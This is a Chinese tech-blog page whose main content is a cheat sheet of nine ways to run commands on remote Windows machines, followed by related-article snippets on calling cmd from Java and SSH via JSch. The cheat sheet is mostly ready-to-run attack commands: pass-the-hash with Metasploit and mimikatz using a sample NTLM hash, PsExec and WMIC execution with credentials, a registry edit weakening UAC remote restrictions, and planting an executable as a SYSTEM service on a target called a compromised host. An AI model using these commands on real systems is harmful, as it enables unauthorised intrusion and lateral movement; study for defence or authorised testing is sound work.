java远程执行cmd命令,windows远程执行cmd命令的9种方法

最新推荐文章于 2024-05-28 03:38:09 发布
最新推荐文章于 2024-05-28 03:38:09 发布
阅读量2.2k 收藏 3
点赞数
文章标签: java远程执行cmd命令

一、远程执行命令方式及对应端口:

 IPC$+AT 445 PSEXEC445 WMI135 Winrm5985(HTTP)&5986(HTTPS)

二、9种远程执行cmd命令的方法:

1.WMI执行命令方式,无回显:

wmic /node:192.168.1.158 /user:pt007 /password:admin123 process call create "cmd.exe /c ipconfig>d:\result.txt"

2.使用Hash直接登录Windows(HASH传递)

抓取windows hash值,得到administrator的hash:

598DDCE2660D3193AAD3B435B51404EE:2D20D252A479F485CDF5E171D93985BF

msf调用payload:use exploit/windows/smb/psexec

show optionsset RHOST 192.168.81.129

setSMBPass 598DDCE2660D3193AAD3B435B51404EE:2D20D252A479F485CDF5E171D93985BFsetSMBUser Administrator

show optionsrun

3. mimikatz传递hash方式连接+at计划任务执行命令:

mimikatz.exe privilege::debug "sekurlsa::pth /domain:. /user:administrator /ntlm:2D20D252A479F485CDF5E171D93985BF" //传递hash

dir \\192.168.1.185\c$

4.WMIcmd执行命令,有回显:

WMIcmd.exe -h 192.168.1.152 -d hostname -u pt007 -p admin123 -c "ipconfig"

5.Cobalt strkie远程执行命令与hash传递攻击:

45ec756a9b45f5ac6a602027e20f186d.png

6.psexec.exe远程执行命令

psexec /accepteula //接受许可协议

sc delete psexesvc

psexec\\192.168.1.185 -u pt007 -p admin123 cmd.exe

7.psexec.vbs远程执行命令

cscript psexec.vbs 192.168.1.158 pt007 admin123 "ipconfig"

8.winrm远程执行命令

//肉机上面快速启动winrm服务,并绑定到5985端口:

winrm quickconfig -q

winrmset winrm/config/Client @{TrustedHosts="*"}

netstat -ano|find "5985"

//客户端连接方式:

winrs -r:http://192.168.1.152:5985 -u:pt007 -p:admin123 "whoami /all"winrs -r:http://192.168.1.152:5985 -u:pt007 -p:admin123 cmd

//UAC问题,修改后,普通管理员登录后也是高权限:

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

winrs -r:http://192.168.1.152:5985 -u:pt007 -p:admin123 "whoami /groups"

9.远程命令执行sc

//建立ipc连接(参见net use + at)后上传等待运行的bat或exe程序到目标系统上,创建服务(开启服务时会以system 权限在远程系统上执行程序):

net use \\192.168.17.138\c$ "admin123" /user:pt007

net use

dir \\192.168.17.138\c$

copy test.exe \\192.168.17.138\c$sc\\192.168.17.138 create test binpath= "c:\test.exe"sc\\192.168.17.138 starttest

sc\\192.168.17.138 del test

增智同学
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
wmi4j 远程执行cmd命令获取命令执行的结果
06-04
该代码实现了在远程windows主机上 获取进程列表 及进程对应的端口;使用wmi4j 连接远程主机获取进程列表,创建文件夹、共享文件夹、执行netstat -ano输出到aa.txt文件,读取文件、撤销文件夹共享、删除文件夹及aa.txt文件;即实现远程执行cmd命令获取命令执行的结果的效果。
Jsch实践(三):如何使用JschChannelShell类,在远程服务器上执行脚本命令?
weixin_43860634的博客
03-16 759
Jsch实践(三):如何使用JschChannelShell类,在远程服务器上执行脚本命令?
java调用cmd执行命令
最新发布
weixin_45210565的博客
05-28 565
3、exec(String command, String[] envp) ,在调用外部程序之前设置系统环境变量,该变量仅供command入参使用,envp每个元素为一个系统环境变量,并且字符串格式为“环境变量名=环境变量值”。2、exec(String[] cmdArray) ,调用外部程序,入参cmdArray的元素将组合成为一条完整的外部可执行程序的启动路径或命令。1、exec(String command) ,调用外部程序,入参command为外部可执行程序的启动路径或命令。
java rmi 实例:远程执行cmd
11-12 1583
rmi,远程方法调用,将service通过rmi接口对外进行发布,客户端通过地址+端口远程调用服务。 项目结构(java项目即可,jdk无要求): --src   --rim2     --CmdService.java --CmdServiceImpl.java --GetService.java --SetService.java --cfg.proper...
java调用cmd命令
花生日记
05-06 6243
2.下面我们就以 java为例,来看一下是如何调用 cmd命令的: 3.首先,我们需要执行一下命令行提示符,如下所示: 4.执行完上面的命令之后, java会把执行结果发送给 cmd: 6.接下来,我们就可以在用户端来使用这些结果了: 7.接下来我们再来看看 cmd是如何接收到这些结果的: 8.在这里,我们可以看到 cmd接受到了两条信息,第一条是“我正在接收”;那么在这个时候,我们只需要改变一下参数就可以了: 11.我们可以看到,这里的参数分别是: 这样一来,就能够保证 cmd命令能够正常执行了。
java调用cmd执行exe_java_Windows系统中Java调用cmd命令执行exe程序的方法Java调用cmd命令,并输出显示信 - phpStudy...
weixin_39521009的博客
02-17 194
Windows系统中Java调用cmd命令执行exe程序的方法Java调用cmd命令,并输出显示信息:package com.anxin.cmd.test;import java.io.BufferedReader;import java.io.InputStreamReader;public class Command {public static void main(String[] arg...
Java调用CMD命令
热门推荐
恋上、小幸福的博客
07-17 1万+
Java开发中,有时候需要与操作系统的命令行交互,执行特定的CMD命令或脚本。然而,处理编码问题是调用CMD命令时常遇到的挑战。正确处理编码可以避免输出结果的乱码,确保程序的稳定运行。本文将介绍Java中调用CMD命令方法,并重点解决编码问题,同时提供一些实用技巧和注意事项。
java运行windowscmd命令简单代码
09-04
Java运行WindowsCMD命令主要涉及Java的Runtime类和ProcessBuilder类,它们允许程序在操作系统环境中执行外部命令。这里,我们重点讨论如何通过Java代码来调用Windows系统的命令行(CMD执行操作。 首先,`...
Java中通过jsch来连接远程服务器执行linux命令
10-22
总结来说,JSCH提供了一灵活且强大的方式,允许Java开发者在远程Linux服务器上执行命令,这对于自动化运维、监控或者数据处理等场景非常有用。但同时,也需要注意相应的安全措施,以避免潜在的安全风险。
java控制台输入cmd命令, ssh远程linux shell命令, 并打印命令输出到控制台
11-24
以上就是使用Java执行本地CMD命令以及通过SSH连接远程Linux服务器执行shell命令的方法。这两个功能的结合,使开发者能够轻松地在不同的操作系统间进行跨平台的系统操作,极大地提高了开发和运维的效率。
使用cmd语句命令实现远程批量关机
08-17
在IT行业中,命令行工具是系统管理的重要组成部分,尤其是在Windows操作系统中,CMD(Command Prompt)是执行系统级任务的基本接口。本教程将详细介绍如何利用CMD命令实现远程批量关机,这对于系统管理员或有...
JAVA代码实现在Windows系统中执行cmd命令
weixin_46115014的博客
05-13 373
JAVA代码实现在Windows系统中执行cmd命令
Java 调用 cmd 执行命令
来到人间不过是个蹭饭的客人,还挑什么酸甜苦辣。
11-22 951
日常开发中有时会遇到用 java 调用 cmd 进行一些操作,例如 ping、ipconfig等。
java执行cmd/wmic命令
weixin_44174685的博客
08-27 498
java执行cmd
Java调用win的cmd命令
qq_57335683的博客
12-04 1464
Java通过类提供了调用CMD命令的能力。这两个类都允许Java程序启动一个新的进程并执行特定的命令,通过标准输入输出流进行数据交换。Runtime类适用于简单的命令执行,ProcessBuilder类则更加灵活,适用于复杂的命令和参数传递。
Java执行CMD
Grey_Wind的博客
04-02 716
相比于C/C++、Rust等语言,Java的代码相对略多,但还好。 示例代码将执行 dir 命令,并输出命令的输出结果。 这个实现使用了 JDK 中的 Runtime 类和 Process 类来执行命令和读取输出结果。exec() 方法返回一个 Process 对象,可以用于控制和监视进程。在这个示例中,我们通过 getInputStream() 方法和 BufferedReader 类读取进程的标准输出流,并在控制台打印输出结果。
Java实现远程连接服务器并执行命令的方法
微小凉
02-22 8362
一.Apache sshd java实现远程连接服务器并执行命令的方法 先描述一下场景,本人在通信领域工作,暂时负责命令行这一块业务,公司使用apache sshd在Java应用中嵌入sshd服务,实现了通过SecureCRT等工具调用自定义的命令的功能,现想把这一套调用过程移植到web页面,通过接口实现命令的下发,网上查找了大量资料,好多资料年代比较久远,还是花了不少时间,最终实现了该功能。 ...
java实现远程windows系统控制
weixin_43222885的博客
07-23 1449
2.在cmd(以管理员身份)中执行winrmsetwinrm/config/service/auth@{Basic="true"}4.在cmd执行winrmsetwinrm/config/service@{AllowUnencrypted="true"}1.在cmd(以管理员身份)中执行winrmquickconfig命令选择Y。利用winrm4j实现cmd命令的调用。需要配置环境用以开启winRM的服务。...
怎么用java代码 实现win10系统的 自动关机?
weixin_45865760的博客
12-24 676
方法一: 先写两个批处理文件 定时关机.bat 和 取消关机.bat 步骤: 1.先新建两个.txt 放在c盘根目录(随便选地方),用以上名字命名。 2.在定时关机.txt里面写上“shutdown -s -t 3600” 3600代表多久之后关机,单位是秒,可以自行设置。如图: 3.再在取消关机.txt 里面写上“shutdown -a”,如图: 4.把这两个txt文件重命名为.bat文件,他会提示你这个,点确定就好。 现在打开你的eclipse,新建两个class: public class 关机
Java JSch远程机器上更改用户 并输入密码并执行多条命令
05-26
使用Java JSch可以连接到远程机器并执行命令,下面是一个示例代码,可以更改用户并执行多条命令: ```java import com.jcraft.jsch.*; public class SSHExample { public static void main(String[] args) { String user = "username"; // 远程机器的用户名 String password = "password"; // 远程机器的密码 String host = "remote_host"; // 远程机器的IP地址或域名 int port = 22; // 远程机器的SSH端口号,默认是22 try { JSch jsch = new JSch(); Session session = jsch.getSession(user, host, port); session.setPassword(password); session.setConfig("StrictHostKeyChecking", "no"); session.connect(); // 更改用户 String command = "sudo su - otheruser"; // 需要更改的用户 Channel channel = session.openChannel("exec"); ((ChannelExec) channel).setCommand(command); channel.connect(); // 输入密码 String sudoPassword = "otheruser_password"; // 需要输入的密码 channel = session.openChannel("exec"); ((ChannelExec) channel).setCommand("echo \"" + sudoPassword + "\" | sudo -S ls"); channel.connect(); // 执行多条命令 String[] commands = {"cd /path/to/directory", "ls -l", "date"}; for (String cmd : commands) { channel = session.openChannel("exec"); ((ChannelExec) channel).setCommand(cmd); channel.setInputStream(null); ((ChannelExec) channel).setErrStream(System.err); channel.connect(); channel.disconnect(); } session.disconnect(); } catch (JSchException e) { e.printStackTrace(); } } } ``` 在这个示例中,我们先通过JSch连接到远程机器,然后使用`sudo su - otheruser`命令切换到需要更改的用户,接着使用`echo`命令和管道符号`|`输入密码,最后使用`openChannel`方法打开一个新的`Channel`并执行多条命令。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值